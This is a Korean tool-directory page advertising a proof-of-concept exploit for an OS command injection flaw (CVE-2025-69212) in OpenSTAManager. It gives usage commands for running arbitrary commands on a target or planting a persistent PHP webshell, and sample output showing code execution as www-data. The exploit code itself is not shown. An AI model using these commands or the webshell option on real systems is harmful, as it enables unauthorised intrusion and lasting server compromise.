Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-69212-PoC — CVE-2025-69212 - OpenSTAManager OS 명령 주입 PoC | Kitploit
도구/GitHubGitHub/alaeddine03/cve-2025-69212-poc
Payload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubalaeddine03/cve-2025-69212-poc

CVE-2025-69212-PoC

CVE-2025-69212 - OpenSTAManager OS 명령 주입 PoC

저장소 보기
482개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-69212 - OpenSTAManager OS 명령 주입 PoC

사용법

의존성 설치:

root@kitploit:~
pip install -r requirements.txt

단일 명령 실행 및 출력 확인:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'

대신 영구적인 PHP 웹쉘 배포:

root@kitploit:~
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell

옵션

플래그설명
-u, --url대상 인스턴스의 기본 URL
-U, --username인증을 위한 사용자 이름
-P, --password인증을 위한 비밀번호
-c, --command실행할 명령어, 출력은 pwn_out.txt에 저장됨
--shell단일 명령 대신 PHP 웹쉘을 files/shell.php에 배포
--id-module인보이스 가져오기 기능의 모듈 ID (기본값: 14)
--id-plugin인보이스 가져오기 기능의 플러그인 ID (기본값: 48)

id_module과 id_plugin은 인스턴스별로 다릅니다. 기본값이 작동하지 않으면 대상의 웹 UI에 로그인하여 전자 인보이스 가져오기 기능으로 이동한 후 브라우저의 네트워크 탭에서 요청 매개변수를 확인하십시오.

예시 출력

root@kitploit:~
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
도구 다운로드